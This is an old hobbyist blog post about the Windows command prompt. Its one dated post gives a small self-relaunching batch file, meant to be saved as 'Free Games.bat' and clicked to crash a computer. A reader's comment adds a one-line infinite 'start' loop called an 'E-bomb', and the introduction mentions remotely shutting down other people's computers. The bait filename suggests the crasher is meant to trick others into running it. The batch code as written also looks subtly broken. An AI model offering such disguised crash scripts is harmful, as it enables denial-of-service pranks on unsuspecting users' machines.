Welcome



Ive made this blog to show you commands you can use in command prompt and how to use them



Now, say you got here not knowing what the cmd prompt is?

Well, the cmd prompt is a console on windows operating systems that controls your computer, from it you can do anything on your computer, and saves the hard work finding where to launch it from normally



The cmd prompt can also let you control your network (lan or wlan). You can remotely shutdown someone elses computer on your network for example.

It is also the only way to find your internal ip address



In my posts i will show you how to open, use and master the cmd prompt




Saturday 8 December 2007

Computer crasher, opens infinity times (use carefully)

Save the small command file below as 'Free Games.bat' on the desktop and then just click on it to crash your computer (it opens itself infinity times)

Edit the code and the name as you wish (if you change the name, the code must change and visa versa)

'

echo off
cls
start desktop\Free Games.bat

'

1 comment:

Jagadeesh Jakku said...

Hi dis is jagadeesh
This is the code what i got to crash a system.

for /l %i in(0,0,0) do start

This is a E-bomb.